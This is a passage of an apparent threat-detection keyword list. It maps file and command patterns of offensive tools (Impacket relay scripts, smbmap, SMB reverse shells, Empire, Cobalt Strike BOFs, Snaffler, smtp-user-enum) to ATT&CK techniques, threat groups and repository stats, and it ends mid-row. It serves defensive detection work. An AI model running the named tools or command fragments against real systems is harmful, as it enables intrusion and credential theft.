TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*smbexec.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*SMBGhost.pcap*,offensive_tool_keyword,SMBGhost,Simple scanner for CVE-2020-0796 - SMBv3 RCE.,T1210 - T1573 - T1553 - T1216 - T1027,TA0006 - TA0011 - TA0008,N/A,N/A,Exploitation tools,https://github.com/ollypwn/SMBGhost,1,1,N/A,N/A,7,647,206,2020-10-01T08:36:29Z,2020-03-11T15:21:27Z -*smbmap -*,offensive_tool_keyword,smbmap,SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.,T1210.001 - T1083 - T1213 - T1021,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Information Gathering,https://github.com/ShawnDEvans/smbmap,1,0,N/A,10,10,1554,344,2023-09-14T20:51:52Z,2015-03-16T13:15:00Z -*smbmap -u guest -H *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*smbmap.py *,offensive_tool_keyword,smbmap,SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.,T1210.001 - T1083 - T1213 - T1021,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Information Gathering,https://github.com/ShawnDEvans/smbmap,1,1,N/A,10,10,1554,344,2023-09-14T20:51:52Z,2015-03-16T13:15:00Z -*smbmap.smbmap*,offensive_tool_keyword,smbmap,SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.,T1210.001 - T1083 - T1213 - T1021,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Information Gathering,https://github.com/ShawnDEvans/smbmap,1,0,N/A,10,10,1554,344,2023-09-14T20:51:52Z,2015-03-16T13:15:00Z -*smbmapDump*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*smbmap-master*,offensive_tool_keyword,smbmap,SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.,T1210.001 - T1083 - T1213 - T1021,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Information Gathering,https://github.com/ShawnDEvans/smbmap,1,1,N/A,10,10,1554,344,2023-09-14T20:51:52Z,2015-03-16T13:15:00Z -*SMBNTLMChallenge*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-InveighRelay.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*SMBNTLMChallenge*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*SMBNTLMResponse*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*smbpasswd.py -newpass *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*smbpasswd.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*SMBRelay.py*,offensive_tool_keyword,responder,LLMNR. NBT-NS and MDNS poisoner,T1557.001 - T1171 - T1547.011,TA0011 - TA0005 - TA0003,N/A,N/A,Sniffing & Spoofing,https://github.com/SpiderLabs/Responder,1,1,N/A,N/A,10,4198,1633,2020-06-15T18:07:44Z,2012-10-24T14:35:12Z -*SMBRelayChallenge*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-InveighRelay.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*smbrelayclient.py*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*smbrelayclient.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*SMBRelayResponse*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-InveighRelay.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*smbrelayserver.*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*smbrelayserver.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*smbrelayx.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*smb-reverse-shell.git*,offensive_tool_keyword,smb-reverse-shell,A Reverse Shell which uses an XML file on an SMB share as a communication channel.,T1021.002 - T1027 - T1105,TA0008 - TA0010 - TA0002,N/A,N/A,C2,https://github.com/r1cksec/smb-reverse-shell,1,1,N/A,10,10,9,0,2022-07-31T10:05:53Z,2022-01-16T21:02:14Z -*smb-reverse-shell-main*,offensive_tool_keyword,smb-reverse-shell,A Reverse Shell which uses an XML file on an SMB share as a communication channel.,T1021.002 - T1027 - T1105,TA0008 - TA0010 - TA0002,N/A,N/A,C2,https://github.com/r1cksec/smb-reverse-shell,1,1,N/A,10,10,9,0,2022-07-31T10:05:53Z,2022-01-16T21:02:14Z -*smbscan*,offensive_tool_keyword,smb-scanner,SMB Scanner tool,T1210.001 - T1190 - T1020 - T1213,TA0007 - TA0002 - TA0001,N/A,N/A,Information Gathering,https://github.com/TechnicalMujeeb/smb-scanner,1,1,N/A,N/A,1,45,9,2018-03-30T10:25:18Z,2018-03-29T14:13:20Z -*smb-scanner*,offensive_tool_keyword,smb-scanner,SMB Scanner tool,T1210.001 - T1190 - T1020 - T1213,TA0007 - TA0002 - TA0001,N/A,N/A,Information Gathering,https://github.com/TechnicalMujeeb/smb-scanner,1,1,N/A,N/A,1,45,9,2018-03-30T10:25:18Z,2018-03-29T14:13:20Z -*SmbScanner.exe*,offensive_tool_keyword,pingcastle,active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands,T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071,TA0006 - TA0008 - TA0009 - TA0011,N/A,N/A,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle,1,1,N/A,N/A,,N/A,,, -*smbserver.py -payload*,offensive_tool_keyword,PPLFault,Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.,T1055 - T1078 - T1112 - T1553 - T1555,TA0001 - TA0002 - TA0003 - TA0005 - TA0011,N/A,N/A,Credential Access,https://github.com/gabriellandau/PPLFault,1,0,N/A,N/A,5,410,66,2023-10-03T20:00:34Z,2022-09-22T19:39:24Z -*smbserver.py -smb2support EXEGOL*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*smbserver.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*smbsigning_check*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*smbspider *,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*smbspider.py*,offensive_tool_keyword,crackmapexec,protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*smbsr.py*,offensive_tool_keyword,SMBSR,Lookup for interesting stuff in SMB shares,T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Reconnaissance,https://github.com/oldboy21/SMBSR,1,1,N/A,N/A,2,138,24,2023-06-16T14:35:30Z,2021-11-10T16:55:52Z -*smicallef/spiderfoot*,offensive_tool_keyword,spiderfoot,The OSINT Platform for Security Assessments,T1595 - T1595.002 - T1596 - T1591 - T1591.002,TA0043 ,N/A,N/A,Information Gathering,https://www.spiderfoot.net/,1,1,N/A,6,10,N/A,N/A,N/A,N/A -*SMShell.sln*,offensive_tool_keyword,SMShell,PoC for a SMS-based shell. Send commands and receive responses over SMS from mobile broadband capable computers,T1021.001 - T1059.006 - T1071.004 - T1069.003,TA0002 - TA0011 - TA0009 - TA0040,N/A,N/A,C2,https://github.com/persistent-security/SMShell,1,1,N/A,10,10,272,20,2023-05-22T10:40:16Z,2023-05-22T08:26:44Z -*smtprelayclient.py*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*smtprelayclient.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*smtp-user-enum * -M EXPN *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*smtp-user-enum * -M RCPT *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*smtp-user-enum * -M VRFY *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*smtp-user-enum*,offensive_tool_keyword,smtp-user-enum,Username guessing tool primarily for use against the default Solaris SMTP service. Can use either EXPN - VRFY or RCPT TO.,T1133 - T1110.001,TA0007 - TA0006,N/A,N/A,Credential Access,https://pentestmonkey.net/tools/user-enumeration/smtp-user-enum,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*SnaffCon/Snaffler*,offensive_tool_keyword,Snaffler,Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment),T1595 - T1592 - T1589 - T1590 - T1591,TA0043,N/A,N/A,Reconnaissance,https://github.com/SnaffCon/Snaffler,1,1,N/A,N/A,10,1569,163,2023-09-18T06:38:35Z,2020-03-30T07:03:47Z -*SnaffCore.csproj*,offensive_tool_keyword,Snaffler,Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment),T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - 